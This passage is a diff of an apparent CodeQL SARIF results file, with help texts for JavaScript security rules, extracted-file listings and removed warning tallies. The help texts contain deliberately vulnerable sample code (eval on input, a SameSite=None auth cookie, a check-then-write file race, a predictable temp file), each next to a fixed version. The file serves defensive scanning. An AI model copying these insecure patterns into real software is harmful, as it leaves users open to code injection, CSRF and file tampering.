show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-807", "external/cwe/cwe-290" ], + "description" : "Conditions that the user controls are not suited for making security-related decisions.", + "id" : "js/user-controlled-bypass", + "kind" : "path-problem", + "name" : "User-controlled bypass of security check", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/unsafe-code-construction", + "name" : "js/unsafe-code-construction", + "shortDescription" : { + "text" : "Unsafe code constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. 
If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. 
If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using externally controlled strings to construct code may allow a malicious\n user to execute arbitrary code.", + "id" : "js/unsafe-code-construction", + "kind" : "path-problem", + "name" : "Unsafe code constructed from library input", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/samesite-none-cookie", + "name" : "js/samesite-none-cookie", + "shortDescription" : { + "text" : "Sensitive cookie without SameSite restrictions" + }, + "fullDescription" : { + "text" : "Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request 
Forgery (CSRF) attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n", + "markdown" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1275" ], + "description" : "Sensitive cookies where the SameSite attribute is set to \"None\" can\n in some cases allow for Cross-Site Request Forgery (CSRF) attacks.", + "id" : "js/samesite-none-cookie", + "kind" : "problem", + "name" : "Sensitive cookie without SameSite restrictions", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/file-system-race", + "name" : "js/file-system-race", + "shortDescription" : { + "text" : "Potential file system race condition" + }, + "fullDescription" : { + "text" : "Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. 
These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. 
Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n", + "markdown" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to 
time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-367" ], + "description" : "Separately checking the state of a file before operating\n on it may allow an attacker to modify the file between\n the two operations.", + "id" : "js/file-system-race", + "kind" : "problem", + "name" : "Potential file system race condition", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.7" + } + }, { + "id" : "js/insecure-temporary-file", + "name" : "js/insecure-temporary-file", + "shortDescription" : { + "text" : "Insecure temporary file" + }, + "fullDescription" : { + "text" : "Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. 
These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n", + "markdown" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. 
These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n" + }, + "properties" : { + "tags" : [ "external/cwe/cwe-377", "external/cwe/cwe-378", "security" ], + "description" : "Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.", + "id" : "js/insecure-temporary-file", + "kind" : "path-problem", + "name" : "Insecure temporary file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.0" + } + }, { + "id" : "js/summary/lines-of-code", + "name" : "js/summary/lines-of-code", + "shortDescription" : { + "text" : "Total lines of JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. 
This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary" ], + "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", + "id" : "js/summary/lines-of-code", + "kind" : "metric", + "name" : "Total lines of JavaScript and TypeScript code in the database" + } + }, { + "id" : "js/summary/lines-of-user-code", + "name" : "js/summary/lines-of-user-code", + "shortDescription" : { + "text" : "Total lines of user written JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary", "lines-of-code" ], + "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", + "id" : "js/summary/lines-of-user-code", + "kind" : "metric", + "name" : "Total lines of user written JavaScript and TypeScript code in the database" + } + } ], + "locations" : [ { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", + "description" : { + "text" : "The QL pack root directory." 
+ } + }, { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + } ] }, - "warning": { - "+": 0, - "-": 15, - "codes": { - "js/ui5-xss XSS vulnerability due to [user-provided value](1).": { - "<": 20, - ">": 0 - }, - "js/ui5-log-injection Log entry depends on a [user-provided value](1).": { - "<": 8, - ">": 0 - }, - "js/cap-sql-injection This query depends on a [user-provided value](1).": { - "<": 6, - ">": 0 - }, - "js/log-injection Log entry depends on a [user-provided value](1).": { - "<": 5, - ">": 0 - }, - "js/cap-log-injection Log entry depends on a [user-provided value](1).": { - "<": 5, - ">": 0 - }, - "js/xss Cross-site scripting vulnerability due to [user-provided value](1).": { - "<": 4, - ">": 0 - }, - "js/ui5-path-injection The path of a saved file depends on a [user-provided value](1).": { - "<": 3, - ">": 0 - }, - "js/ui5-formula-injection The content of a saved file depends on a [user-provided value](1).": { - "<": 3, - ">": 0 - }, - "js/ui5-clickjacking Possible clickjacking vulnerability due to missing frame options.": { - "<": 2, - ">": 0 - }, - "js/missing-rate-limiting This route handler performs [a database access](1), but is not rate-limited.": { - "<": 1, - ">": 0 - }, - "js/sql-injection This query string depends on a [user-provided value](1).": { - "<": 1, - ">": 0 - }, - "js/ui5-xss XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2).": { - "<": 1, - ">": 0 - }, - "js/ui5-clickjacking Possible clickjacking vulnerability due to window\\[ ... 
onfig\"\\] being set to `allow`.": { - "<": 1, - ">": 0 - }, - "js/ui5-clickjacking Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`.": { - "<": 1, - ">": 0 - }, - "js/cap-log-injection Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2).": { - "<": 1, - ">": 0 + "invocations" : [ { + "toolExecutionNotifications" : [ { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + } + } ], + "message" : { + "text" : "" + }, + 
"level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 
"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 
3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + 
"uriBaseId" : "%SRCROOT%", + "index" : 21 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : 
"none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
